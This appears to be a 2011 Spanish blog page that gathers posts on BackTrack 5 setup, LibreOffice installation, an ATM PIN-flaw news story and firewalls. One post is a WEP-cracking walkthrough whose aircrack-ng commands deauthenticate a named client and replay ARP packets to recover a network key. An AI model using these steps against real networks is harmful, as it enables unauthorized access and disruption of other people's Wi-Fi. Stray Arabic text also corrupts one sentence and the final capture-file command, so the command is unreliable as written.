viernes, 20 de mayo de 2011

miércoles, 18 de mayo de 2011

Instalar LibreOffice en Backtrack 5


Si la semana pasada hablábamos sobre que LibreOffice por fin tenía dominio propio en esta ocasión, gracias a Omg! Ubuntu!, toca hacerlo para dar a conocer que está disponible el repositorio PPA oficial para Ubuntu, desde el cuál podrás  instalarlo de una manera más fácil que antes.

Hay que recordar que la versión actual es la Release Candidate 2, por lo que en poco tiempo saldrá una versión todavía más estable, aunque por mi parte no he tenido ningún problema.


Antes de nada debo avisar que al instalar LibreOffice de la forma que pongo a continuación se eliminará automáticamente OpenOffice, si lo que quieres es disponer de ambos los pasos a seguir son estos.

Para añadir el repositorio e instalar bastará con seguir estos pasos en el terminal:

sudo add-apt-repository ppa:libreoffice/ppa

sudo apt-get update

sudo apt-get purge openoffice*.* 

sudo apt-get install libreoffice

Para una mejor compatibilidad con nuestro entorno de escritorio, recomiendan instalar el correspondiente paquete:
Gnome


sudo apt-get install libreoffice-gnome


KDE


sudo apt-get install libreoffice-kde


Si quieres tenerlo en Español sólo hay que instalar el siguiente paquete:



sudo apt-get install libreoffice-l10n-es


Para añadir los diccionarios de español:

sudo apt-get install language-support-writing-es


Ya lo he comentado en varias ocasiones desde la creación del fork de OpenOffice, este proyecto ha avanzado muy rápidamente, habiendo una gran acogida por parte de la Comunidad que espero y deseo siga así.

Saludos.

Cambiar de Idioma a Backtrack 5 GNOME

Hola a todos, en este post les explicare como cambiar el idioma de nuestro Backtrack 5 GNOME, para aquellos que tengan instalado este entorno de escritorio GNOME, seguro les es dificil encontrar la forma de cambiar idioma, pero sin dejando de rodeos, voy al grano:

1.- Primer Paso: Abrir el terminal



2.- Segundo Paso : Poner en el terminal lo siguiente:

apt-get install language-selector



3.- Luego de dejar que carge, ponemos lo 
siguiente en el mismo terminal:

gnome-language-selector

Y nos aparecera esta advertencia, le damos a 
Install o Instalar(bueno a mi me sale Instalar porque estuve viendo como cambiar el idioma y modifique algunas cosas con otros metodos para cambiar de idioma en GNOME, por eso algunas cosas me salen en español)...



4.- Luego eligiremos el Idioma a instalar
( Primero vamos a textos y elegimos el idioma que queramos, luego a Idiomas, en Idioma hacemos click en Instalar o eliminar, en otros casos Add or Remove, y nos saldra una ventana buscamos el idioma ingles o english y lequitamos el check que tiene y luego seleccionamos el idioma a instalar y le marcamos una check).



5.- Luego dejamos que cargue demora unos 
minutos, luego nos saldra una pantalla como esta y le damos close o cerrar:


6.- Luego cerramos la ventanita de la configuracion de idioma y listo ponemos en nuestro terminal " shutdown -r now " para reiniciar y surgan los efectos.



7.- Totalmente en Español (Bueno elegi mi 
idioma nativo ):



Bueno esto es todo...

Dios les bendiga



PD: Para cambiar idioma a Firefox luego 
de hacer todo este tutorial, ponemos en un terminal:

aptitude upgrade y apt-get upgrade
 
Dejen que cargue, demora unos minutos y listo... Fuente:Taringa

sábado, 14 de mayo de 2011

Video Cracking WEP - Desasociando un cliente conectado al AP

En este vide se muestra el ataque 0 - Deautenticación para desasociar un cliente conectado al punto de acceso y asi obtener la clave WEP (Wired Equivalent Privacy) de la red inalambrica. El objetivo principal de los paquetes de deautenticación es interrumpir-romper la asociacion entre el cliente conectadioy el AP (Access Point). El ataque 0 o de Deautenticación (--deauth) es también conocido como el ataque DoS (Denegacion de Servicio), pero no es el propósito del vídeo.

Ataque 0: Deautenticación
Ataque 3: Reinyección de una petición ARP (ARP-request)
Estos pasos también se puede revisar en el post anterior.

Herramientas
* Backtrack 4 R2
http://www.backtrack-linux.org/downloads/
* Aircrack-ng (incluida en BackTrack)
http://www.aircrack-ng.org/
* Tarjeta WiFi que soporte el modo Monitor y la Inyección د باقويتيس.



Attack 0: Deauthentication + Attack 3: ARP Packets Injection = Key Found!! from delfirosales on Vimeo.

Comandos
root@bt:~# airmon-ng start wlan0

root@bt:~# airodump-ng mon0

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0

root@bt:~# aircrack-ng captura-01.شاب
 
Vídeo Online
http://youtu.be/jUeBo2qBNJg?hd=1
Descargar Vídeo
http://www.mediafire.com/?q9doqdr2539c06b


Descubren manera de sacar dinero de cajeros automáticos, y sin clave


Esta noticia de hoy espero que se difunda lo antes posible por todos los medios, pero sin querer alarmar mucho solo diré que se ha descubierto lo que posiblemente sea el problema de seguridad mas grande jamás enfrentado por la industria de los cajeros automáticos…
Un equipo de investigadores de Cambridge University en el Reino Unido han descubierto una manera “extremadamente sencilla” en engañar a cualquier cajero automático para que debite dinero de una cuenta, incluso sin el estafador saber la clave (o “PIN”) del dueño de la tarjeta.

Los investigadores aun no quieren dar detalles del ataque por motivos obvios (aunque se sospecha que la técnica ya se conocen en el mercado negro, dado casos de personas que reportan que dinero mágicamente desaparece de sus cuentas), pero el ataque consiste de primero clonar una tarjeta de cualquier persona (algo que hoy día es totalmente trivial y que lo puede hacer incluso alguien con muy pocos conocimientos técnicos), y después utilizar un software especial conectada a una laptop.

Lo que sucede en el próximo paso es que de la laptop sale conectado por medio de un fino cable la tarjeta clonada, que se inserta en el cajero automático. En este momento, el cajero automático pide el PIN del usuario, y es aquí en donde viene el gran problema: Los investigadores han descubierto una falla fatal en los sistemas de verificación de PIN en los cajeros automáticos que permite que uno no necesite la clave para sacar dinero. En otras palabras, en este punto el cajero acepta cualquier clave como valida.

Para demostrar la veracidad y seriedad del caso, reporteros de la BBC de Londres visitaron a los investigadores de Cambridge y sacaron de sus carteras un par de tarjetas de débito, las cuales fueron inmediatamente clonadas, insertadas en un cajero cercano, y ciertamente sacaran dinero de las cuentas sin ningún problema. Como dicen, oh oh…

La seriedad del caso es que como dicen los mismos investigadores: “Esta es una falla en un sistema que es utilizado por cientos de millones de personas, por decenas de miles de bancos y millones de vendedores.”
Y como agrega el Profesor Ross Anderson, uno de los investigadores principales de este descubrimiento: “Creemos que esta es una de las mas graves fallas que hemos descubierto – que se han descubierto jamás – en sistemas de pagos, y yo he estado en este negocio [de descubrir fallas de seguridad] por 25 años.”

En otras palabras, solo esperemos que las instituciones financieras de todo el mundo se percaten de este problema y empiecen a implementar una solución lo antes posible. Mientras tanto, si se les esfuma el dinero de sus cuentas de manera “mágica”, ya pueden apuntarle este artículo a sus bancos como evidencia de que algo feo podría estar ocurriendo…
Página oficial que describre el ataque de seguridad
Fuente de la noticia

¿Realmente nos protege un Firewall?

Estar detrás de un firewall no es garantía de estar seguros al 100%. La seguridad de nuestra red muchas veces no depende de las herramientas o aplicaciones sino de cómo se utilizan las mismas.

Conectarnos a Internet sin contar con las herramientas adecuadas y con un firewall bien configurado es el equivalente a tener una casa sin cerraduras en las puertas. Un intruso puede tomar control de los servidores o de las PCs de los usuarios y tener acceso a información privilegiada.


¿Qué es un Firewall? básicamente es un filtro capaz de controlar y examinar todas las comunicaciones, entrantes y salientes, que pasan de una red a otra permitiendo o denegando el acceso.

Un firewall (o cortafuegos) se utiliza para proteger una computadora o una red interna, de intentos de acceso no autorizados desde Internet u otras redes externas, denegando las transmisiones y vigilando todos los puertos de red. Su uso más común es situarlo entre una red local e Internet, evitando que los intrusos puedan atacar o acceder las computadoras de la red local.

Existen dos tipos básicos de firewall disponibles: firewall por hardware y firewall por software. Comúnmente se suele combinar ambos en una red para aumentar la seguridad de la misma.

Un firewall por hardware viene instalado en la mayoría de los routers que utilizamos para acceder a Internet. Este tipo de firewall disfraza la dirección y puertos de la PC a los intrusos y monitorean las comunicaciones entre redes.

Un firewall por hardware nos protege del uso oculto y riesgos externos de servicios como www y ftp. También nos protege de programas maliciosos con los Trojan Dialers: programas que cortan la conexión actual y utilizan la línea para llamadas de larga distancia utilizadas por terceros.

Ejemplos de firewall por hardware son: Panda GateDefender Integra 100 y 300, D-Link DFL 800 y la serie Cisco ASA 5500 Adaptive Security Appliances, por nombrar algunos.

Un firewall por software es una aplicación de seguridad que se puede instalar o viene integrada con el sistema operativo. Este tipo de firewall monitorea y bloquea siempre que sea necesario el tráfico de Internet.

Ejemplos de firewall por software son: Zone Alarm, Agnitum Outpost Free y Sygate Personal Firewall, por nombrar algunos.

Una limitación importante de la mayoría de firewall por software es que solo controla los paquetes que llegan a nuestro ordenador y no los que se envían.

¿Es necesario un firewall por software si tengo un router? un firewall por hardware no consume recursos del sistema y una vez configurado protege a todos los equipos en la red. Pero no todos los routers cubren las principales opciones (routers caseros) ni todos los equipos se conectan siempre a la misma red.

Si utilizamos un equipo portátil el uso de una aplicación firewall instalada en nuestro sistema es indispensable ya que el acceso a internet lo podemos hacer por medio de redes privadas o públicas de las cuales no sabemos ni su configuración ni el tipo de información que circula por la misma.

Hay que tener en cuenta que un firewall independientemente si es por hardware o software no nos protegerá de ataques cuyo tráfico no pase por el mismo, de la copia local de datos en medios físicos de almacenamiento, de ataques de ingeniería social, de virus informáticos en archivos o software y de fallos de seguridad de los servicios y protocolos cuyo tráfico esté permitido.

Para proteger ese 1% que queda en el aire y no importando el tipo de firewall que se use debemos utilizar un antivirus si nuestro sistema operativo lo amerita, ser cuidadoso cuando navegamos por internet, estar atento con las aplicaciones o servicios a los que permitimos acceso en nuestro firewall y de ser posible usar un política restrictiva que deniegue todo el tráfico excepto el que sea explícitamente permitido.

El mejor firewall es el que uno administra, con un firewall correctamente configurado podemos impedir el 99% de las intrusiones en nuestro sistema.

martes, 10 de mayo de 2011

Pronto BackTrack 5 !!!

Bueno chicos... Se nos viene BackTrack 5 !!!

En esencia seguira siendo la excelente herramienta de pentesting de siempre, solo que ahora se puede elegir entre KDE y Gnome para los fanaticos de Gnome XD.

El primer Release sale en 3 días (10 de mayo), así que a esperar...

Para mayor información la Web oficial: http://www.backtrack-linux.org/


Fuente:

VOLVIMOS

 YA ESTAMOS ACTIVOS, ASI QUE PENDIENTES